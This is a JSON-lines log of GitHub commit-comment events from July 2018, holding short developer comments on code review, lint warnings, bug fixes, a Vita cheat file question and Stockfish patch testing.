{"id":"7916199949","type":"CommitCommentEvent","actor":{"login":"kirasento"},"repo":{"name":"ShumnoT/VitaCheatDatabase"},"payload":{"comment":{"id":29589815,"position":null,"line":null,"path":null,"commit_id":"fd964f3239ccf1b772e5d8543b30101565f6aa26","created_at":"2018-07-04T04:40:25Z","updated_at":"2018-07-04T04:40:25Z","author_association":"NONE","body":"Hi Demensional\r\ni have install FFX mai dump....the Game ID PCSE00293....like your instrustion above...i make random code and export it and i already copy the code above except the game id....when i transfer the file back it doesnt show any cheats...can you make and PCSE00293 file? also i hack my vita using h-encore and install enso 3.65 "}},"created_at":"2018-07-04T04:40:25Z"}
{"id":"7916205930","type":"CommitCommentEvent","actor":{"login":"bugs181"},"repo":{"name":"bugs181/expressive-middleware"},"payload":{"comment":{"id":29589821,"position":null,"line":null,"path":null,"commit_id":"14fbb3ad0b055589d0c9154f14835bd4b56abe2f","created_at":"2018-07-04T04:43:07Z","updated_at":"2018-07-04T04:43:07Z","author_association":"OWNER","body":"https://github.com/hughsk/flat/issues/73"}},"created_at":"2018-07-04T04:43:07Z"}
{"id":"7916205999","type":"CommitCommentEvent","actor":{"login":"Shubham11598"},"repo":{"name":"Shubham11598/Navigation-System-In-Web-"},"payload":{"comment":{"id":29589822,"position":null,"line":null,"path":null,"commit_id":"997077c8172f844f81ffadf1529bf0036442ac2c","created_at":"2018-07-04T04:43:09Z","updated_at":"2018-07-04T04:43:09Z","author_association":"OWNER","body":"sa"}},"created_at":"2018-07-04T04:43:09Z"}
{"id":"7916208507","type":"CommitCommentEvent","actor":{"login":"goodmami"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29589829,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-04T04:44:21Z","updated_at":"2018-07-04T04:44:21Z","author_association":"MEMBER","body":"@emm68 PyDelphin, at least, does not only target the ERG, so I try to develop things according to general specifications rather than just the observed outputs of the ERG. But even in the ERG there are some predicates with uppercase letters, such as `_4WD_n_1_rel` (note that it is `_4WD_n_1_rel` in `lexicon.tdl`, but `_4wd_n_1` in the SEM-I (`etc/surface.smi`)). ACE (as of version `0.9.27`) only generates with the form that is present in the lexicon. I believe this is a bug, but it is currently a limitation we have to work with."}},"created_at":"2018-07-04T04:44:21Z"}
{"id":"7916208618","type":"CommitCommentEvent","actor":{"login":"zhiwenhuang"},"repo":{"name":"zhiwenhuang/audio-equalizer-chrome"},"payload":{"comment":{"id":29589830,"position":null,"line":null,"path":null,"commit_id":"bb534b5fbec59abe634dce888709f5a7fbd84a89","created_at":"2018-07-04T04:44:23Z","updated_at":"2018-07-04T04:44:23Z","author_association":"OWNER","body":"I thought it would be more clean looking and cleaner to use."}},"created_at":"2018-07-04T04:44:23Z"}
{"id":"7916210404","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29589836,"position":59,"line":null,"path":"app/src/at-thachnguyen/res/layout/activity_menu.xml","commit_id":"add1add41dd7cc27fa66e27ec88749af72453e21","created_at":"2018-07-04T04:45:14Z","updated_at":"2018-07-04T04:45:14Z","author_association":"NONE","body":"WARNING: [ExtraText] Unexpected text found in layout file: \"android:textStyle=\"bold\" />\"\n Layout resource files should only contain elements and attributes. Any XML text content found \\\nin the file is likely accidental (and potentially dangerous if the text resembles XML and the \\\ndeveloper believes the text to be functional)"}},"created_at":"2018-07-04T04:45:14Z"}
{"id":"7916210418","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29589837,"position":2,"line":null,"path":"app/src/at-thachnguyen/res/layout/menu_item.xml","commit_id":"add1add41dd7cc27fa66e27ec88749af72453e21","created_at":"2018-07-04T04:45:14Z","updated_at":"2018-07-04T04:45:14Z","author_association":"NONE","body":"WARNING: [UseCompoundDrawables] This tag and its children can be replaced by one `<TextView/>` and a compound drawable\n A `LinearLayout` which contains an `ImageView` and a `TextView` can be more efficiently handled as a compound drawable (a single TextView, using the `drawableTop`, `drawableLeft`, `drawableRight` and/or `drawableBottom` attributes to draw one or more images adjacent to the text).\n\nIf the two widgets are offset from each other with margins, this can be replaced with a `drawablePadding` attribute.\n\nThere's a lint quickfix to perform this conversion in the Eclipse plugin."}},"created_at":"2018-07-04T04:45:14Z"}
{"id":"7916217882","type":"CommitCommentEvent","actor":{"login":"baarsrj"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29589853,"position":null,"line":null,"path":null,"commit_id":"1685373dedc9d430b35e834ebdf7877e5fcd21d8","created_at":"2018-07-04T04:48:40Z","updated_at":"2018-07-04T04:48:40Z","author_association":"CONTRIBUTOR","body":"Now it is, but in time it will not. It is more like 'wrongwordincontext', but for a different group of users. We might want to give the entire category a 'default = off', since people not affected by dyslexis will not make those mistakes."}},"created_at":"2018-07-04T04:48:40Z"}
{"id":"7916222671","type":"CommitCommentEvent","actor":{"login":"leesc22"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29589861,"position":null,"line":null,"path":null,"commit_id":"837ef56a4b97d3e15bdb8249dd75b73262a469e8","created_at":"2018-07-04T04:50:48Z","updated_at":"2018-07-04T04:50:48Z","author_association":"NONE","body":"@Dman-89 `tabBackground` attribute is not required. \r\n\r\nModify the activity_main.xml file. Change the background of the root LinearLayout as well, so that the tabs are the same color as the app bar. \r\n\r\nLinearLayout `background` attribute has changed from tan_background to primary_color."}},"created_at":"2018-07-04T04:50:48Z"}
{"id":"7916223300","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589868,"position":28,"line":47,"path":"lesson4/station.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:51:05Z","updated_at":"2018-07-04T04:51:05Z","author_association":"NONE","body":"одна из стандартных проверок, которая возможно используется чаще всего - проверка на сущестование\r\nаргумент вообще пришел?\r\nон не нил?\r\nеще, кроме формата, вполне можно проверить тип пришедшего аргумента, потому что если аргумент не стринг, то формат проверять бессмысленно\r\n```\r\n2.5.1 :016 > '123' !~ /[0-9]/\r\n => false \r\n2.5.1 :017 > 123 !~ /[0-9]/\r\n => true\r\n```"}},"created_at":"2018-07-04T04:51:05Z"}
{"id":"7916225626","type":"CommitCommentEvent","actor":{"login":"ravminsk"},"repo":{"name":"ravminsk/-home-ravminsk-eclipse-workspace-myzip"},"payload":{"comment":{"id":29589870,"position":null,"line":null,"path":null,"commit_id":"d6ab08f72eda377f6822e2588013b07da4c27956","created_at":"2018-07-04T04:52:09Z","updated_at":"2018-07-04T04:52:09Z","author_association":"OWNER","body":"заполняет 1010101110 в List"}},"created_at":"2018-07-04T04:52:09Z"}
{"id":"7916229735","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29589874,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-04T04:54:09Z","updated_at":"2018-07-04T04:54:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T04:54:09Z"}
{"id":"7916232373","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589879,"position":4,"line":6,"path":"lesson4/station.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T04:55:25Z","updated_at":"2018-07-04T04:55:25Z","author_association":"NONE","body":"не очень понятная регулярка\r\nво-первых в ней, мне кажется, ошибка... потому что, если `^` стоит так, то нужно перед закрывающим слешем добавить `$`... если ты хотел `^` поместить внутрь `[]`, то тоже логика не ясна ))\r\nво-вторых для имени станции можно было бы написать какую-то более сложную регулярку, чтобы например проверяла, что символов не меньше 2-х... или что букв не меньше 2-х и после букв разрешена одна цифра...\r\nв общем надо с регуляркой еще поколдовать"}},"created_at":"2018-07-04T04:55:25Z"}
{"id":"7916241562","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29589895,"position":null,"line":null,"path":null,"commit_id":"63fe69f2cccdf21cd32a122f5a19f6a4a631a25b","created_at":"2018-07-04T04:59:17Z","updated_at":"2018-07-04T04:59:17Z","author_association":"OWNER","body":"Tag #105"}},"created_at":"2018-07-04T04:59:17Z"}
{"id":"7916243906","type":"CommitCommentEvent","actor":{"login":"AxelVargas"},"repo":{"name":"Kapytal-io/KYL"},"payload":{"comment":{"id":29589904,"position":null,"line":null,"path":null,"commit_id":"d75af24f4dfcf223f6f06690fbf0ab04296a03ce","created_at":"2018-07-04T05:00:15Z","updated_at":"2018-07-04T05:00:15Z","author_association":"NONE","body":"Token Example"}},"created_at":"2018-07-04T05:00:15Z"}
{"id":"7916247961","type":"CommitCommentEvent","actor":{"login":"nicoder"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29589913,"position":58,"line":55,"path":"README.md","commit_id":"14b325021664755db06a514b5ad55d326b91aaad","created_at":"2018-07-04T05:01:54Z","updated_at":"2018-07-04T05:01:54Z","author_association":"NONE","body":"\"you have use\" => \"you have to use\"?"}},"created_at":"2018-07-04T05:01:54Z"}
{"id":"7916249193","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589915,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:02:26Z","updated_at":"2018-07-04T05:02:26Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:02:26Z"}
{"id":"7916250922","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589918,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:03:12Z","updated_at":"2018-07-04T05:03:12Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:03:12Z"}
{"id":"7916251481","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589919,"position":66,"line":229,"path":"lesson4/interface.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T05:03:27Z","updated_at":"2018-07-04T05:03:27Z","author_association":"NONE","body":"вот это называется \"грубое нарушение принципа инкапсуляции\" ))\r\nинтерфейс не должен ничего знать про \"правила\" других классов\r\n\"рейзить\" ошибки, относящиеся к классу Роут в корне неверно\r\nэти ошибки может выкидывать либо сам класс Роут, либо специальный класс-валидатор (модуль), который подключен в класс Роут и методы которого там вызваны"}},"created_at":"2018-07-04T05:03:27Z"}
{"id":"7916252496","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589921,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:03:57Z","updated_at":"2018-07-04T05:03:57Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:03:57Z"}
{"id":"7916253091","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589922,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:04:12Z","updated_at":"2018-07-04T05:04:12Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:04:12Z"}
{"id":"7916253687","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589923,"position":66,"line":229,"path":"lesson4/interface.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T05:04:28Z","updated_at":"2018-07-04T05:04:28Z","author_association":"NONE","body":"интерфейс должен просто принять данные и отправить их в класс\r\nесли класс выкинет ошибку, то отловить ее и возможно попросить повторный ввод данных"}},"created_at":"2018-07-04T05:04:28Z"}
{"id":"7916255019","type":"CommitCommentEvent","actor":{"login":"Lokeshwarrobo"},"repo":{"name":"Techzindia/Kali-linux-For_Termux"},"payload":{"comment":{"id":29589926,"position":null,"line":null,"path":null,"commit_id":"65108fee1fcf9c565615360d3aa5c84956b90e3d","created_at":"2018-07-04T05:05:04Z","updated_at":"2018-07-04T05:05:04Z","author_association":"NONE","body":"Where is the script"}},"created_at":"2018-07-04T05:05:04Z"}
{"id":"7916255664","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29589927,"position":null,"line":null,"path":null,"commit_id":"a1997637bbf8b0eda97df7f3b8ce12c93ad8de7b","created_at":"2018-07-04T05:05:20Z","updated_at":"2018-07-04T05:05:20Z","author_association":"OWNER","body":"Fantastic! I never thought this would unblock so many games!"}},"created_at":"2018-07-04T05:05:20Z"}
{"id":"7916256979","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589928,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:05:53Z","updated_at":"2018-07-04T05:05:53Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:05:53Z"}
{"id":"7916257562","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29589929,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-04T05:06:10Z","updated_at":"2018-07-04T05:06:10Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-04T05:06:10Z"}
{"id":"7916258097","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589930,"position":66,"line":229,"path":"lesson4/interface.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T05:06:24Z","updated_at":"2018-07-04T05:06:24Z","author_association":"NONE","body":"на самом деле даже перечисленное - это уже перебор ))\r\nпо хорошему этот класс нужно разнести на 2 разных, один будет заниматься только вводом-выводом (собственно интерфейс), а второй нести логику: вызывать методы интерфейса, отправлять данные в другие классы, перехватывать ошибки\r\nно пока можно оставить как есть )"}},"created_at":"2018-07-04T05:06:24Z"}
{"id":"7916259543","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589932,"position":66,"line":229,"path":"lesson4/interface.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T05:07:05Z","updated_at":"2018-07-04T05:07:05Z","author_association":"NONE","body":"ну и далее по коду тоже конечно же все рейзы из интерфейса убери"}},"created_at":"2018-07-04T05:07:05Z"}
{"id":"7916259924","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29589933,"position":null,"line":null,"path":null,"commit_id":"0d9860fae2ecb5d4c2399da8ba905d69c7aefcc5","created_at":"2018-07-04T05:07:14Z","updated_at":"2018-07-04T05:07:14Z","author_association":"CONTRIBUTOR","body":"@ddongule 정리하느라 고생 많으셨습니다. TWL은 개인 폴더에 작성하는 것을 권장하고 있어요. \r\n다음 수업 부터는 개인 깃헙 ID로 된 폴더에 올려주시면 구분해서 보기 좋을 것 같아요.\r\n이 파일을 옮기는 과정은 다음 수업 시간에 알려드릴게요 :)"}},"created_at":"2018-07-04T05:07:14Z"}
{"id":"7916263826","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29589938,"position":68,"line":231,"path":"lesson4/interface.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T05:08:58Z","updated_at":"2018-07-04T05:08:58Z","author_association":"NONE","body":"\"рескью\" пишут на одном уровне с `def` и `end`"}},"created_at":"2018-07-04T05:08:58Z"}
{"id":"7916264337","type":"CommitCommentEvent","actor":{"login":"bxrz"},"repo":{"name":"adilapapaya/TopSecret"},"payload":{"comment":{"id":29589943,"position":null,"line":null,"path":null,"commit_id":"a3e64328cd810798f8f9198ea169de7d2e5da58a","created_at":"2018-07-04T05:09:12Z","updated_at":"2018-07-04T05:09:12Z","author_association":"NONE","body":"Hey. The file you put here to download has no .jar file. So Processing can't find it or use it. Is there any solution to this or get around? I only need the download for the Descriptive class but can't find it in any other libraries \r\nhttp://adilapapaya.com/papayastatistics/\r\n\r\n"}},"created_at":"2018-07-04T05:09:12Z"}
{"id":"7916264368","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29589944,"position":null,"line":null,"path":null,"commit_id":"2354821e53bb1b84dd3ff8b62f07e63ca9b1fc3e","created_at":"2018-07-04T05:09:13Z","updated_at":"2018-07-04T05:09:13Z","author_association":"CONTRIBUTOR","body":"@honeybeat1 정리하느라 고생 많으셨습니다. 스크린샷까지 올려주시다니 멋져요 👍 💯 \r\nTWL은 개인 폴더에 작성하는 것을 권장하고 있어요. \r\n다음 수업 부터는 개인 깃헙 ID로 된 폴더에 올려주시면 구분해서 보기 좋을 것 같아요.\r\n이 파일을 본인계정의 폴더로 옮기는 과정은 다음 수업 시간에 알려드릴게요 :)"}},"created_at":"2018-07-04T05:09:13Z"}
{"id":"7916264815","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29589947,"position":null,"line":null,"path":null,"commit_id":"986e3d07c00e0b2b92cc23d7c02e93a789fa81c7","created_at":"2018-07-04T05:09:25Z","updated_at":"2018-07-04T05:09:25Z","author_association":"NONE","body":"This actually can be tried for almost all pieces I think, isn't \"overloaded rook\" a thing?"}},"created_at":"2018-07-04T05:09:25Z"}
{"id":"7916271993","type":"CommitCommentEvent","actor":{"login":"tsjensen"},"repo":{"name":"jshiell/checkstyle-idea"},"payload":{"comment":{"id":29589961,"position":4,"line":18,"path":"src/main/resources/checkstyle-idea.properties","commit_id":"e7170f4b136c02926e7c6b5e392c5b6f3cb62a56","created_at":"2018-07-04T05:12:25Z","updated_at":"2018-07-04T05:12:25Z","author_association":"CONTRIBUTOR","body":"Don‘t forget 8.10.1 😉"}},"created_at":"2018-07-04T05:12:25Z"}
{"id":"7916273483","type":"CommitCommentEvent","actor":{"login":"Osndok"},"repo":{"name":"Osndok/zim-desktop-wiki"},"payload":{"comment":{"id":29589962,"position":null,"line":null,"path":null,"commit_id":"dfb6c932dd14840b294fed63a447315badc3266f","created_at":"2018-07-04T05:13:02Z","updated_at":"2018-07-04T05:13:02Z","author_association":"OWNER","body":"An unexpected side effect of this change seems to be even faster population of the auto-completion/suggestion menu, similar to:\r\n* https://github.com/jaap-karssenberg/zim-desktop-wiki/pull/121\r\n\r\n... I'm a bit surprised to find that simply calculating a substring would have a noticable effect, so maybe there is a hidden database query, or something.\r\n"}},"created_at":"2018-07-04T05:13:02Z"}
{"id":"7916275607","type":"CommitCommentEvent","actor":{"login":"oxtoacart"},"repo":{"name":"getlantern/borda-clj"},"payload":{"comment":{"id":29589966,"position":5,"line":29,"path":"src/borda_clj/client.clj","commit_id":"cc77b0ba02500ed22423741fb16eb00a22902944","created_at":"2018-07-04T05:13:54Z","updated_at":"2018-07-04T05:13:54Z","author_association":"CONTRIBUTOR","body":"Thanks for catching that! Fixed here - https://github.com/getlantern/borda-clj/pull/4"}},"created_at":"2018-07-04T05:13:54Z"}
{"id":"7916280094","type":"CommitCommentEvent","actor":{"login":"fupuchu"},"repo":{"name":"fupuchu/whatdis.tech"},"payload":{"comment":{"id":29589972,"position":null,"line":null,"path":null,"commit_id":"f75ba12526ce35a500176cbb4715901e945b592f","created_at":"2018-07-04T05:15:44Z","updated_at":"2018-07-04T05:15:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [setup basic routes](https://trello.com/c/sMk9hACA/37-setup-basic-routes)"}},"created_at":"2018-07-04T05:15:44Z"}
{"id":"7916280475","type":"CommitCommentEvent","actor":{"login":"PaulieD"},"repo":{"name":"PaulieD/dash"},"payload":{"comment":{"id":29589973,"position":16,"line":140,"path":"src/zmq/zmqnotificationinterface.cpp","commit_id":"75273c51a56e5893f34ea753c2480b4c158e9720","created_at":"2018-07-04T05:15:51Z","updated_at":"2018-07-04T05:15:51Z","author_association":"OWNER","body":"could combine these lines into one, using post increment:\r\n`it = notifiers.erase(it--);` \r\n"}},"created_at":"2018-07-04T05:15:51Z"}
{"id":"7916282121","type":"CommitCommentEvent","actor":{"login":"fupuchu"},"repo":{"name":"fupuchu/whatdis.tech"},"payload":{"comment":{"id":29589978,"position":null,"line":null,"path":null,"commit_id":"ac66e53a430ed264d15517dd2f005341a7ab4fe3","created_at":"2018-07-04T05:16:33Z","updated_at":"2018-07-04T05:16:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [setup basic routes](https://trello.com/c/sMk9hACA/37-setup-basic-routes)"}},"created_at":"2018-07-04T05:16:33Z"}
{"id":"7916289744","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29589994,"position":null,"line":null,"path":null,"commit_id":"986e3d07c00e0b2b92cc23d7c02e93a789fa81c7","created_at":"2018-07-04T05:19:42Z","updated_at":"2018-07-04T05:19:42Z","author_association":"OWNER","body":"@Vizvezdenec I thought I recalled trying this with knights, bishops, rooks, and queens,\r\n\r\nhttp://tests.stockfishchess.org/tests/view/5aac194a0ebc5902997ff056\r\n\r\nbut in hindsight, this was with a previous version of overload which was not committed (it didn't work well).  I might retry a version of this idea, now that you mention it.  Thank you!"}},"created_at":"2018-07-04T05:19:42Z"}
{"id":"7916291322","type":"CommitCommentEvent","actor":{"login":"PaulieD"},"repo":{"name":"PaulieD/dash"},"payload":{"comment":{"id":29589996,"position":null,"line":null,"path":null,"commit_id":"75273c51a56e5893f34ea753c2480b4c158e9720","created_at":"2018-07-04T05:20:19Z","updated_at":"2018-07-04T05:20:19Z","author_association":"OWNER","body":"Wouldn't work when the iterator is at position 0 b/c the iterator would try to become negative. Reverting"}},"created_at":"2018-07-04T05:20:19Z"}
{"id":"7916293820","type":"CommitCommentEvent","actor":{"login":"noahc3"},"repo":{"name":"yexun1995/auto-h-encore"},"payload":{"comment":{"id":29590002,"position":null,"line":null,"path":null,"commit_id":"0a5bf9a5220086f0b7bae97dd5950c75da4d75dd","created_at":"2018-07-04T05:21:21Z","updated_at":"2018-07-04T05:21:21Z","author_association":"NONE","body":"Hey, could we collaborate on this? I'm implementing a language selection system and it would be nice to have a translation to start things off."}},"created_at":"2018-07-04T05:21:21Z"}
{"id":"7916294554","type":"CommitCommentEvent","actor":{"login":"yhgon"},"repo":{"name":"NVIDIA/tacotron2"},"payload":{"comment":{"id":29590005,"position":null,"line":null,"path":null,"commit_id":"480f44ee2382a8863be1e7356dcce770c7a81244","created_at":"2018-07-04T05:21:39Z","updated_at":"2018-07-04T05:21:39Z","author_association":"NONE","body":"replace distributed.py with APEX distributed.py  file"}},"created_at":"2018-07-04T05:21:39Z"}
{"id":"7916313218","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29590033,"position":null,"line":null,"path":null,"commit_id":"a6cb4faf26051e5cb8bc493c685411a2b8126ab0","created_at":"2018-07-04T05:29:00Z","updated_at":"2018-07-04T05:29:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180704-052859 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180704-052859\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-04T05:29:00Z"}
{"id":"7916315397","type":"CommitCommentEvent","actor":{"login":"yexun1995"},"repo":{"name":"yexun1995/auto-h-encore"},"payload":{"comment":{"id":29590035,"position":null,"line":null,"path":null,"commit_id":"0a5bf9a5220086f0b7bae97dd5950c75da4d75dd","created_at":"2018-07-04T05:29:54Z","updated_at":"2018-07-04T05:29:54Z","author_association":"OWNER","body":"Ok！"}},"created_at":"2018-07-04T05:29:54Z"}
{"id":"7916319402","type":"CommitCommentEvent","actor":{"login":"sdboyer"},"repo":{"name":"ddunbar/swift-package-manager"},"payload":{"comment":{"id":29590046,"position":null,"line":null,"path":null,"commit_id":"ad9f85b4ab1988f9b9c4031d2347ccf635ca7280","created_at":"2018-07-04T05:31:20Z","updated_at":"2018-07-04T05:31:20Z","author_association":"NONE","body":"oh oh, i was quick on the first response, but slow on this follow-up!\r\n\r\ni'mma be in SF July 15-20, actually. Are you in Utah then? if not, i'd love to meet up. Drop me an email? sam-at-samboyer-org"}},"created_at":"2018-07-04T05:31:20Z"}
{"id":"7916320132","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29590049,"position":null,"line":null,"path":null,"commit_id":"9f9f575e220d13800027357e13c93b48aa2074ab","created_at":"2018-07-04T05:31:37Z","updated_at":"2018-07-04T05:31:37Z","author_association":"OWNER","body":"The Automation script which invokes other scripts to work"}},"created_at":"2018-07-04T05:31:37Z"}
{"id":"7916322878","type":"CommitCommentEvent","actor":{"login":"luckyadam"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29590057,"position":null,"line":null,"path":null,"commit_id":"a0d667481bc21bcd5cb4911992dcc2761aed8cff","created_at":"2018-07-04T05:32:42Z","updated_at":"2018-07-04T05:32:42Z","author_association":"CONTRIBUTOR","body":"@finian 新版本已经修复啦"}},"created_at":"2018-07-04T05:32:42Z"}
{"id":"7916323769","type":"CommitCommentEvent","actor":{"login":"exitlol"},"repo":{"name":"green-fox-academy/exitlol"},"payload":{"comment":{"id":29590064,"position":1,"line":1,"path":"week-07/day-01/index.js","commit_id":"aabdc79898cb9c9de146a6c95a558b6b7a8a28f6","created_at":"2018-07-04T05:33:03Z","updated_at":"2018-07-04T05:33:03Z","author_association":"COLLABORATOR","body":"it was because of the settings of the formatter i've downloaded for JS now it's using single ;) "}},"created_at":"2018-07-04T05:33:03Z"}
{"id":"7916324436","type":"CommitCommentEvent","actor":{"login":"weltling"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29590067,"position":null,"line":null,"path":null,"commit_id":"ef9ed19ec7f141311feea1d42467f5773cfc09bc","created_at":"2018-07-04T05:33:19Z","updated_at":"2018-07-04T05:33:19Z","author_association":"CONTRIBUTOR","body":"Thanks for fixing that! I didn't hit it, unfortunately, as it's libxml2 version dependent. It seems that `LIBXML2_NEW_BUFFER` already enough to check these symbols availability, so the exact symbol checks are not required. They can be added of course, if we see it's needed later.\r\n\r\nThanks. "}},"created_at":"2018-07-04T05:33:19Z"}
{"id":"7916325910","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29590068,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-04T05:33:56Z","updated_at":"2018-07-04T05:33:56Z","author_association":"NONE","body":"My two cents, for anyone who takes interest:\r\nI say commit this patch. Updating alpha here is a lie. If you don't believe that, then this update is AT LEAST inconsistent with other pruning decisions made throughout Stockfish. \r\nIf people are really unsure here, you could try an unusual SPRT bound ... [-1, 3]? maybe even something like [-2, 2]"}},"created_at":"2018-07-04T05:33:56Z"}
